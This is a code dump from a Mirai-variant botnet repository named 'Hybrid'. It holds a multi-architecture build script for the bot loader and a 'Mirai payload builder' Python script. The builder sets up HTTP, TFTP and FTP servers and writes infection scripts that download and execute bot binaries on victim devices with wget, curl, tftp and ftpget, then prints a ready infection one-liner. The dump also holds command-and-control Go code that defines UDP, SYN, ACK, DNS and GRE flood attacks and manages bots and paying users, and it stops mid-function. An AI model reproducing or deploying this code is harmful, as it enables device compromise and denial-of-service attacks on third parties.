-ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.arm5 70 | armv6l-gcc -Os -D BOT_ARCH=\"arm6\" -D ARM -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.arm6 71 | armv7l-gcc -Os -D BOT_ARCH=\"arm7\" -D ARM -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.arm7 72 | i586-gcc -Os -D BOT_ARCH=\"x86\" -D X32 -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.x86 73 | m68k-gcc -Os -D BOT_ARCH=\"m68k\" -D M68K -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.m68k 74 | mips-gcc -Os -D BOT_ARCH=\"mips\" -D MIPS -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.mips 75 | mipsel-gcc -Os -D BOT_ARCH=\"mpsl\" -D MIPSEL -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.mpsl 76 | powerpc-gcc -Os -D BOT_ARCH=\"ppc\" -D PPC -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.ppc 77 | sh4-gcc -Os -D BOT_ARCH=\"sh4\" -D SH4 -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.sh4 78 | sparc-gcc -Os -D BOT_ARCH=\"spc\" -D SPARC -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.spc 79 | armv4l-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.arm 80 | armv5l-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.arm5 81 | armv6l-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.arm6 82 | armv7l-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.arm7 83 | i586-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.x86 84 | m68k-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.m68k 85 | mips-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.mips 86 | mipsel-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.mpsl 87 | powerpc-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.ppc 88 | sh4-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.sh4 89 | sparc-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.spc 90 | mv ~/dlr/release/dlr* ~/loader/bins 91 | rm -rf ~/dlr ~/loader/src ~/bot ~/scanListen.go ~/Projects ~/build.sh -------------------------------------------------------------------------------- /Hybridd/Hybrid/build_payload.py: -------------------------------------------------------------------------------- 1 | """ 2 | 3 | _____________________________________ 4 | | | 5 | | MIRAI PAYLOAD BUILDER | 6 | | Made By DaddyL33T | 7 | |_____________________________________| 8 | 9 | """ 10 | import subprocess, sys, urllib 11 | ip = urllib.urlopen('http://api.ipify.org').read() 12 | exec_bin = "3AvA" 13 | exec_name = "ssh" 14 | bin_prefix = "Josho." 15 | bin_directory = "AB4g5" 16 | archs = ["x86", #1 17 | "mips", #2 18 | "mpsl", #3 19 | "arm4", #4 20 | "arm5", #5 21 | "arm6", #6 22 | "arm7", #7 23 | "ppc", #8 24 | "m68k", #9 25 | "sh4"] #10 26 | def run(cmd): 27 | subprocess.call(cmd, shell=True) 28 | print("Setting up HTTP TFTP and FTP for your payload") 29 | print(" ") 30 | run("yum install httpd -y &> /dev/null") 31 | run("service httpd start &> /dev/null") 32 | run("yum install xinetd tftp tftp-server -y &> /dev/null") 33 | run("yum install vsftpd -y &> /dev/null") 34 | run("service vsftpd start &> /dev/null") 35 | run('''echo "service tftp 36 | { 37 | socket_type = dgram 38 | protocol = udp 39 | wait = yes 40 | user = root 41 | server = /usr/sbin/in.tftpd 42 | server_args = -s -c /var/lib/tftpboot 43 | disable = no 44 | per_source = 11 45 | cps = 100 2 46 | flags = IPv4 47 | } 48 | " > /etc/xinetd.d/tftp''') 49 | run("service xinetd start &> /dev/null") 50 | run('''echo "listen=YES 51 | local_enable=NO 52 | anonymous_enable=YES 53 | write_enable=NO 54 | anon_root=/var/ftp 55 | anon_max_rate=2048000 56 | xferlog_enable=YES 57 | listen_address='''+ ip +''' 58 | listen_port=21" > /etc/vsftpd/vsftpd-anon.conf''') 59 | run("service vsftpd restart &> /dev/null") 60 | run("service xinetd restart &> /dev/null") 61 | print("Creating .sh Bins") 62 | print(" ") 63 | run('echo "#!/bin/bash" > /var/lib/tftpboot/t8UsA.sh') 64 | run('echo "ulimit -n 1024" >> /var/lib/tftpboot/t8UsA.sh') 65 | run('echo "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/t8UsA.sh') 66 | run('echo "#!/bin/bash" > /var/lib/tftpboot/t8UsA2.sh') 67 | run('echo "ulimit -n 1024" >> /var/lib/tftpboot/t8UsA2.sh') 68 | run('echo "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/t8UsA2.sh') 69 | run('echo "#!/bin/bash" > /var/www/html/8UsA.sh') 70 | run('echo "ulimit -n 1024" >> /var/lib/tftpboot/t8UsA2.sh') 71 | run('echo "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/t8UsA2.sh') 72 | run('echo "#!/bin/bash" > /var/ftp/8UsA1.sh') 73 | run('echo "ulimit -n 1024" >> /var/ftp/8UsA1.sh') 74 | run('echo "cp /bin/busybox /tmp/" >> /var/ftp/8UsA1.sh') 75 | for i in archs: 76 | run('echo "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://' + ip + '/'+bin_directory+'/'+bin_prefix+i+'; curl -O http://' + ip + '/'+bin_directory+'/'+bin_prefix+i+';cat '+bin_prefix+i+' >'+exec_bin+';chmod +x *;./'+exec_bin+' '+exec_name+'" >> /var/www/html/8UsA.sh') 77 | run('echo "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; ftpget -v -u anonymous -p anonymous -P 21 ' + ip + ' '+bin_prefix+i+' '+bin_prefix+i+';cat '+bin_prefix+i+' >'+exec_bin+';chmod +x *;./'+exec_bin+' '+exec_name+'" >> /var/ftp/8UsA1.sh') 78 | run('echo "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp ' + ip + ' -c get '+bin_prefix+i+';cat '+bin_prefix+i+' >'+exec_bin+';chmod +x *;./'+exec_bin+' '+exec_name+'" >> /var/lib/tftpboot/t8UsA.sh') 79 | run('echo "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r '+bin_prefix+i+' -g ' + ip + ';cat '+bin_prefix+i+' >'+exec_bin+';chmod +x *;./'+exec_bin+' '+exec_name+'" >> /var/lib/tftpboot/t8UsA2.sh') 80 | run("service xinetd restart &> /dev/null") 81 | run("service httpd restart &> /dev/null") 82 | run('echo -e "ulimit -n 99999" >> ~/.bashrc') 83 | print("\x1b[0;32mPayload: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://" + ip + "/8UsA.sh; curl -O http://" + ip + "/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp " + ip + " -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g " + ip + "; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 " + ip + " 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *\x1b[0m") 84 | print("") 85 | raw_input("press any key to exit....") 86 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/cnc/attack.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "strings" 6 | "strconv" 7 | "net" 8 | "encoding/binary" 9 | "errors" 10 | "github.com/mattn/go-shellwords" 11 | ) 12 | 13 | type AttackInfo struct { 14 | attackID uint8 15 | attackFlags []uint8 16 | attackDescription string 17 | } 18 | 19 | type Attack struct { 20 | Duration uint32 21 | Type uint8 22 | Targets map[uint32]uint8 // Prefix/netmask 23 | Flags map[uint8]string // key=value 24 | } 25 | 26 | type FlagInfo struct { 27 | flagID uint8 28 | flagDescription string 29 | } 30 | 31 | var flagInfoLookup map[string]FlagInfo = map[string]FlagInfo { 32 | "len": FlagInfo { 33 | 0, 34 | "Size of packet data, default is 512 bytes", 35 | }, 36 | "rand": FlagInfo { 37 | 1, 38 | "Randomize packet data content, default is 1 (yes)", 39 | }, 40 | "tos": FlagInfo { 41 | 2, 42 | "TOS field value in IP header, default is 0", 43 | }, 44 | "ident": FlagInfo { 45 | 3, 46 | "ID field value in IP header, default is random", 47 | }, 48 | "ttl": FlagInfo { 49 | 4, 50 | "TTL field in IP header, default is 255", 51 | }, 52 | "df": FlagInfo { 53 | 5, 54 | "Set the Dont-Fragment bit in IP header, default is 0 (no)", 55 | }, 56 | "sport": FlagInfo { 57 | 6, 58 | "Source port, default is random", 59 | }, 60 | "dport": FlagInfo { 61 | 7, 62 | "Destination port, default is random", 63 | }, 64 | "domain": FlagInfo { 65 | 8, 66 | "Domain name to attack", 67 | }, 68 | "dhid": FlagInfo { 69 | 9, 70 | "Domain name transaction ID, default is random", 71 | }, 72 | "urg": FlagInfo { 73 | 11, 74 | "Set the URG bit in IP header, default is 0 (no)", 75 | }, 76 | "ack": FlagInfo { 77 | 12, 78 | "Set the ACK bit in IP header, default is 0 (no) except for ACK flood", 79 | }, 80 | "psh": FlagInfo { 81 | 13, 82 | "Set the PSH bit in IP header, default is 0 (no)", 83 | }, 84 | "rst": FlagInfo { 85 | 14, 86 | "Set the RST bit in IP header, default is 0 (no)", 87 | }, 88 | "syn": FlagInfo { 89 | 15, 90 | "Set the ACK bit in IP header, default is 0 (no) except for SYN flood", 91 | }, 92 | "fin": FlagInfo { 93 | 16, 94 | "Set the FIN bit in IP header, default is 0 (no)", 95 | }, 96 | "seqnum": FlagInfo { 97 | 17, 98 | "Sequence number value in TCP header, default is random", 99 | }, 100 | "acknum": FlagInfo { 101 | 18, 102 | "Ack number value in TCP header, default is random", 103 | }, 104 | "gcip": FlagInfo { 105 | 19, 106 | "Set internal IP to destination ip, default is 0 (no)", 107 | }, 108 | "method": FlagInfo { 109 | 20, 110 | "HTTP method name, default is get", 111 | }, 112 | "postdata": FlagInfo { 113 | 21, 114 | "POST data, default is empty/none", 115 | }, 116 | "path": FlagInfo { 117 | 22, 118 | "HTTP path, default is /", 119 | }, 120 | "conns": FlagInfo { 121 | 24, 122 | "Number of connections", 123 | }, 124 | "source": FlagInfo { 125 | 25, 126 | "Source IP address, 255.255.255.255 for random", 127 | }, 128 | } 129 | 130 | var attackInfoLookup map[string]AttackInfo = map[string]AttackInfo { 131 | "udp": AttackInfo { 132 | 0, 133 | []uint8 { 2, 3, 4, 0, 1, 5, 6, 7, 25 }, 134 | "UDP flood", 135 | }, 136 | "vse": AttackInfo { 137 | 1, 138 | []uint8 { 2, 3, 4, 5, 6, 7 }, 139 | "Valve source engine specific flood", 140 | }, 141 | "dns": AttackInfo { 142 | 2, 143 | []uint8 { 2, 3, 4, 5, 6, 7, 8, 9 }, 144 | "DNS resolver flood using the targets domain, input IP is ignored", 145 | }, 146 | "syn": AttackInfo { 147 | 3, 148 | []uint8 { 2, 3, 4, 5, 6, 7, 11, 12, 13, 14, 15, 16, 17, 18, 25 }, 149 | "SYN flood", 150 | }, 151 | "ack": AttackInfo { 152 | 4, 153 | []uint8 { 0, 1, 2, 3, 4, 5, 6, 7, 11, 12, 13, 14, 15, 16, 17, 18, 25 }, 154 | "ACK flood", 155 | }, 156 | "stomp": AttackInfo { 157 | 5, 158 | []uint8 { 0, 1, 2, 3, 4, 5, 7, 11, 12, 13, 14, 15, 16 }, 159 | "TCP stomp flood", 160 | }, 161 | "greip": AttackInfo { 162 | 6, 163 | []uint8 {0, 1, 2, 3, 4, 5, 6, 7, 19, 25}, 164 | "GRE IP flood", 165 | }, 166 | "greeth": AttackInfo { 167 | 7, 168 | []uint8 {0, 1, 2, 3, 4, 5, 6, 7, 19, 25}, 169 | "GRE Ethernet flood", 170 | }, 171 | "udpplain": AttackInfo { 172 | 8, 173 | []uint8 {0, 1, 7}, 174 | "UDP flood with less options. optimized for higher PPS", 175 | }, 176 | "std": AttackInfo { 177 | 9, 178 | []uint8 { 0, 6, 7 }, 179 | "STD flood", 180 | }, 181 | "xmas": AttackInfo { 182 | 9, 183 | []uint8 { 0, 6, 7 }, 184 | "STD flood", 185 | }, 186 | 187 | } 188 | 189 | func uint8InSlice(a uint8, list []uint8) bool { 190 | for _, b := range list { 191 | if b == a { 192 | return true 193 | } 194 | } 195 | return false 196 | } 197 | 198 | func NewAttack(str string, admin int) (*Attack, error) { 199 | atk := &Attack{0, 0, make(map[uint32]uint8), make(map[uint8]string)} 200 | args, _ := shellwords.Parse(str) 201 | 202 | var atkInfo AttackInfo 203 | // Parse attack name 204 | if len(args) == 0 { 205 | return nil, errors.New("Must specify an attack name") 206 | } else { 207 | if args[0] == "?" { 208 | validCmdList := "\033[37;1mAvailable attack list\r\n\033[36;1m" 209 | for cmdName, atkInfo := range attackInfoLookup { 210 | validCmdList += cmdName + ": " + atkInfo.attackDescription + "\r\n" 211 | } 212 | return nil, errors.New(validCmdList) 213 | } 214 | var exists bool 215 | atkInfo, exists = attackInfoLookup[args[0]] 216 | if !exists { 217 | return nil, errors.New(fmt.Sprintf("\033[33;1m%s \033[31mis not a valid attack!", args[0])) 218 | } 219 | atk.Type = atkInfo.attackID 220 | args = args[1:] 221 | } 222 | 223 | // Parse targets 224 | if len(args) == 0 { 225 | return nil, errors.New("Must specify prefix/netmask as targets") 226 | } else { 227 | if args[0] == "?" { 228 | return nil, errors.New("\033[37;1mComma delimited list of target prefixes\r\nEx: 192.168.0.1\r\nEx: 10.0.0.0/8\r\nEx: 8.8.8.8,127.0.0.0/29") 229 | } 230 | cidrArgs := strings.Split(args[0], ",") 231 | if len(cidrArgs) > 255 { 232 | return nil, errors.New("Cannot specify more than 255 targets in a single attack!") 233 | } 234 | for _,cidr := range cidrArgs { 235 | prefix := "" 236 | netmask := uint8(32) 237 | cidrInfo := strings.Split(cidr, "/") 238 | if len(cidrInfo) == 0 { 239 | return nil, errors.New("Blank target specified!") 240 | } 241 | prefix = cidrInfo[0] 242 | if len(cidrInfo) == 2 { 243 | netmaskTmp, err := strconv.Atoi(cidrInfo[1]) 244 | if err != nil || netmask > 32 || netmask < 0 { 245 | return nil, errors.New(fmt.Sprintf("Invalid netmask was supplied, near %s", cidr)) 246 | } 247 | netmask = uint8(netmaskTmp) 248 | } else if len(cidrInfo) > 2 { 249 | return nil, errors.New(fmt.Sprintf("Too many /'s in prefix, near %s", cidr)) 250 | } 251 | 252 | ip := net.ParseIP(prefix) 253 | if ip == nil { 254 | return nil, errors.New(fmt.Sprintf("Failed to parse IP address, near %s", cidr)) 255 | } 256 | atk.Targets[binary.BigEndian.Uint32(ip[12:])] = netmask 257 | } 258 | args = args[1:] 259 | } 260 | 261 | // Parse attack duration time 262 | if len(args) == 0 { 263 | return nil, errors.New("Must specify an attack duration") 264 | } else { 265 | if args[0] == "?" { 266 | return nil, errors.New("\033[37;1mDuration of the attack, in seconds") 267 | } 268 | duration, err := strconv.Atoi(args[0]) 269 | if err != nil || duration == 0 || duration > 86400 { 270 | return nil, errors.New(fmt.Sprintf("Invalid attack duration, near %s. Duration must be between 0 and 86400 seconds", args[0])) 271 | } 272 | atk.Duration = uint32(duration) 273 | args = args[1:] 274 | } 275 | 276 | // Parse flags 277 | for len(args) > 0 { 278 | if args[0] == "?" { 279 | validFlags := "\033[37;1mList of flags key=val seperated by spaces. Valid flags for this method are\r\n\r\n" 280 | for _, flagID := range atkInfo.attackFlags { 281 | for flagName, flagInfo := range flagInfoLookup { 282 | if flagID == flagInfo.flagID { 283 | validFlags += flagName + ": " + flagInfo.flagDescription + "\r\n" 284 | break 285 | } 286 | } 287 | } 288 | validFlags += "\r\nValue of 65535 for a flag denotes random (for ports, etc)\r\n" 289 | validFlags += "Ex: seq=0\r\nEx: sport=0 dport=65535" 290 | return nil, errors.New(validFlags) 291 | } 292 | flagSplit := strings.SplitN(args[0], "=", 2) 293 | if len(flagSplit) != 2 { 294 | return nil, errors.New(fmt.Sprintf("Invalid key=value flag combination near %s", args[0])) 295 | } 296 | flagInfo, exists := flagInfoLookup[flagSplit[0]] 297 | if !exists || !uint8InSlice(flagInfo.flagID, atkInfo.attackFlags) || (admin == 0 && flagInfo.flagID == 25) { 298 | return nil, errors.New(fmt.Sprintf("Invalid flag key %s, near %s", flagSplit[0], args[0])) 299 | } 300 | if flagSplit[1][0] == '"' { 301 | flagSplit[1] = flagSplit[1][1:len(flagSplit[1]) - 1] 302 | fmt.Println(flagSplit[1]) 303 | } 304 | if flagSplit[1] == "true" { 305 | flagSplit[1] = "1" 306 | } else if flagSplit[1] == "false" { 307 | flagSplit[1] = "0" 308 | } 309 | atk.Flags[uint8(flagInfo.flagID)] = flagSplit[1] 310 | args = args[1:] 311 | } 312 | if len(atk.Flags) > 255 { 313 | return nil, errors.New("Cannot have more than 255 flags") 314 | } 315 | 316 | return atk, nil 317 | } 318 | 319 | func (this *Attack) Build() ([]byte, error) { 320 | buf := make([]byte, 0) 321 | var tmp []byte 322 | 323 | // Add in attack duration 324 | tmp = make([]byte, 4) 325 | binary.BigEndian.PutUint32(tmp, this.Duration) 326 | buf = append(buf, tmp...) 327 | 328 | // Add in attack type 329 | buf = append(buf, byte(this.Type)) 330 | 331 | // Send number of targets 332 | buf = append(buf, byte(len(this.Targets))) 333 | 334 | // Send targets 335 | for prefix,netmask := range this.Targets { 336 | tmp = make([]byte, 5) 337 | binary.BigEndian.PutUint32(tmp, prefix) 338 | tmp[4] = byte(netmask) 339 | buf = append(buf, tmp...) 340 | } 341 | 342 | // Send number of flags 343 | buf = append(buf, byte(len(this.Flags))) 344 | 345 | // Send flags 346 | for key,val := range this.Flags { 347 | tmp = make([]byte, 2) 348 | tmp[0] = key 349 | strbuf := []byte(val) 350 | if len(strbuf) > 255 { 351 | return nil, errors.New("Flag value cannot be more than 255 bytes!") 352 | } 353 | tmp[1] = uint8(len(strbuf)) 354 | tmp = append(tmp, strbuf...) 355 | buf = append(buf, tmp...) 356 | } 357 | 358 | // Specify the total length 359 | if len(buf) > 4096 { 360 | return nil, errors.New("Max buffer is 4096") 361 | } 362 | tmp = make([]byte, 2) 363 | binary.BigEndian.PutUint16(tmp, uint16(len(buf) + 2)) 364 | buf = append(tmp, buf...) 365 | 366 | return buf, nil 367 | } 368 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/cnc/bot.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "net" 5 | "time" 6 | ) 7 | 8 | type Bot struct { 9 | uid int 10 | conn net.Conn 11 | version byte 12 | source string 13 | } 14 | 15 | func NewBot(conn net.Conn, version byte, source string) *Bot { 16 | return &Bot{-1, conn, version, source} 17 | } 18 | 19 | func (this *Bot) Handle() { 20 | clientList.AddClient(this) 21 | defer clientList.DelClient(this) 22 | 23 | buf := make([]byte, 2) 24 | for { 25 | this.conn.SetDeadline(time.Now().Add(180 * time.Second)) 26 | if n,err := this.conn.Read(buf); err != nil || n != len(buf) { 27 | return 28 | } 29 | if n,err := this.conn.Write(buf); err != nil || n != len(buf) { 30 | return 31 | } 32 | } 33 | } 34 | 35 | func (this *Bot) QueueBuf(buf []byte) { 36 | this.conn.Write(buf) 37 | } 38 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/cnc/clientList.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "time" 5 | "math/rand" 6 | "sync" 7 | "fmt" 8 | ) 9 | 10 | type AttackSend struct { 11 | buf []byte 12 | count int 13 | botCata string 14 | } 15 | 16 | type ClientList struct { 17 | uid int 18 | count int 19 | clients map[int]*Bot 20 | addQueue chan *Bot 21 | delQueue chan *Bot 22 | atkQueue chan *AttackSend 23 | totalCount chan int 24 | cntView chan int 25 | distViewReq chan int 26 | distViewRes chan map[string]int 27 | cntMutex *sync.Mutex 28 | } 29 | 30 | func NewClientList() *ClientList { 31 | c := &ClientList{0, 0, make(map[int]*Bot), make(chan *Bot, 128), make(chan *Bot, 128), make(chan *AttackSend), make(chan int, 64), make(chan int), make(chan int), make(chan map[string]int), &sync.Mutex{}} 32 | go c.worker() 33 | go c.fastCountWorker() 34 | return c 35 | } 36 | 37 | func (this *ClientList) Count() int { 38 | this.cntMutex.Lock() 39 | defer this.cntMutex.Unlock() 40 | 41 | this.cntView <- 0 42 | return <-this.cntView 43 | } 44 | 45 | func (this *ClientList) Distribution() map[string]int { 46 | this.cntMutex.Lock() 47 | defer this.cntMutex.Unlock() 48 | this.distViewReq <- 0 49 | return <-this.distViewRes 50 | } 51 | 52 | func (this *ClientList) AddClient(c *Bot) { 53 | this.addQueue <- c 54 | fmt.Printf("\033[90m[\033[92mBot Joined\033[90m] \033[90m[\033[92m%s\033[90m]\t \033[90m[\033[92m%s\033[90m]\n", c.source, c.conn.RemoteAddr()) 55 | } 56 | 57 | func (this *ClientList) DelClient(c *Bot) { 58 | this.delQueue <- c 59 | fmt.Printf("\033[90m[\033[31mBot Died\033[90m] \033[90m[\033[31m%s\033[90m]\t \033[90m[\033[31m%s\033[90m]\n", c.source, c.conn.RemoteAddr()) 60 | } 61 | 62 | func (this *ClientList) QueueBuf(buf []byte, maxbots int, botCata string) { 63 | attack := &AttackSend{buf, maxbots, botCata} 64 | this.atkQueue <- attack 65 | } 66 | 67 | func (this *ClientList) fastCountWorker() { 68 | for { 69 | select { 70 | case delta := <-this.totalCount: 71 | this.count += delta 72 | break 73 | case <-this.cntView: 74 | this.cntView <- this.count 75 | break 76 | } 77 | } 78 | } 79 | 80 | func (this *ClientList) worker() { 81 | rand.Seed(time.Now().UTC().UnixNano()) 82 | 83 | for { 84 | select { 85 | case add := <-this.addQueue: 86 | this.totalCount <- 1 87 | this.uid++ 88 | add.uid = this.uid 89 | this.clients[add.uid] = add 90 | break 91 | case del := <-this.delQueue: 92 | this.totalCount <- -1 93 | delete(this.clients, del.uid) 94 | break 95 | case atk := <-this.atkQueue: 96 | if atk.count == -1 { 97 | for _,v := range this.clients { 98 | if atk.botCata == "" || atk.botCata == v.source { 99 | v.QueueBuf(atk.buf) 100 | } 101 | } 102 | } else { 103 | var count int 104 | for _, v := range this.clients { 105 | if count > atk.count { 106 | break 107 | } 108 | if atk.botCata == "" || atk.botCata == v.source { 109 | v.QueueBuf(atk.buf) 110 | count++ 111 | } 112 | } 113 | } 114 | break 115 | case <-this.cntView: 116 | this.cntView <- this.count 117 | break 118 | case <-this.distViewReq: 119 | res := make(map[string]int) 120 | for _,v := range this.clients { 121 | if ok,_ := res[v.source]; ok > 0 { 122 | res[v.source]++ 123 | } else { 124 | res[v.source] = 1 125 | } 126 | } 127 | this.distViewRes <- res 128 | } 129 | } 130 | } 131 | 132 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/cnc/database.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "database/sql" 5 | "fmt" 6 | "net" 7 | "encoding/binary" 8 | "time" 9 | _ "github.com/go-sql-driver/mysql" 10 | "errors" 11 | ) 12 | 13 | type Database struct { 14 | db *sql.DB 15 | } 16 | 17 | type AccountInfo struct { 18 | username string 19 | maxBots int 20 | admin int 21 | } 22 | 23 | func NewDatabase(dbAddr string, dbUser string, dbPassword string, dbName string) *Database { 24 | db, err := sql.Open("mysql", fmt.Sprintf("%s:%s@tcp(%s)/%s", dbUser, dbPassword, dbAddr, dbName)) 25 | if err != nil { 26 | fmt.Println(err) 27 | } 28 | fmt.Println("Mysql DB opened") 29 | return &Database{db} 30 | } 31 | 32 | func (this *Database) TryLogin(username string, password string) (bool, AccountInfo) { 33 | rows, err := this.db.Query("SELECT username, max_bots, admin FROM users WHERE username = ? AND password = ? AND (wrc = 0 OR (UNIX_TIMESTAMP() - last_paid < `intvl` * 24 * 60 * 60))", username, password) 34 | if err != nil { 35 | fmt.Println(err) 36 | return false, AccountInfo{"", 0, 0} 37 | } 38 | defer rows.Close() 39 | if !rows.Next() { 40 | return false, AccountInfo{"", 0, 0} 41 | } 42 | var accInfo AccountInfo 43 | rows.Scan(&accInfo.username, &accInfo.maxBots, &accInfo.admin) 44 | return true, accInfo 45 | } 46 | 47 | func (this *Database) CreateUser(username string, password string, max_bots int, duration int, cooldown int) bool { 48 | rows, err := this.db.Query("SELECT username FROM users WHERE username = ?", username) 49 | if err != nil { 50 | fmt.Println(err) 51 | return false 52 | } 53 | if rows.Next() { 54 | return false 55 | } 56 | this.db.Exec("INSERT INTO users (username, password, max_bots, admin, last_paid, cooldown, duration_limit) VALUES (?, ?, ?, 0, UNIX_TIMESTAMP(), ?, ?)", username, password, max_bots, cooldown, duration) 57 | return true 58 | } 59 | 60 | func (this *Database) ContainsWhitelistedTargets(attack *Attack) bool { 61 | rows, err := this.db.Query("SELECT prefix, netmask FROM whitelist") 62 | if err != nil { 63 | fmt.Println(err) 64 | return false 65 | } 66 | defer rows.Close() 67 | for rows.Next() { 68 | var prefix string 69 | var netmask uint8 70 | rows.Scan(&prefix, &netmask) 71 | 72 | // Parse prefix 73 | ip := net.ParseIP(prefix) 74 | ip = ip[12:] 75 | iWhitelistPrefix := binary.BigEndian.Uint32(ip) 76 | 77 | for aPNetworkOrder, aN := range attack.Targets { 78 | rvBuf := make([]byte, 4) 79 | binary.BigEndian.PutUint32(rvBuf, aPNetworkOrder) 80 | iAttackPrefix := binary.BigEndian.Uint32(rvBuf) 81 | if aN > netmask { // Whitelist is less specific than attack target 82 | if netshift(iWhitelistPrefix, netmask) == netshift(iAttackPrefix, netmask) { 83 | return true 84 | } 85 | } else if aN < netmask { // Attack target is less specific than whitelist 86 | if (iAttackPrefix >> aN) == (iWhitelistPrefix >> aN) { 87 | return true 88 | } 89 | } else { // Both target and whitelist have same prefix 90 | if (iWhitelistPrefix == iAttackPrefix) { 91 | return true 92 | } 93 | } 94 | } 95 | } 96 | return false 97 | } 98 | 99 | func (this *Database) CanLaunchAttack(username string, duration uint32, fullCommand string, maxBots int, allowConcurrent int) (bool, error) { 100 | rows, err := this.db.Query("SELECT id, duration_limit, admin, cooldown FROM users WHERE username = ?", username) 101 | defer rows.Close() 102 | if err != nil { 103 | fmt.Println(err) 104 | } 105 | var userId, durationLimit, admin, cooldown uint32 106 | if !rows.Next() { 107 | return false, errors.New("Your access has been terminated") 108 | } 109 | rows.Scan(&userId, &durationLimit, &admin, &cooldown) 110 | 111 | 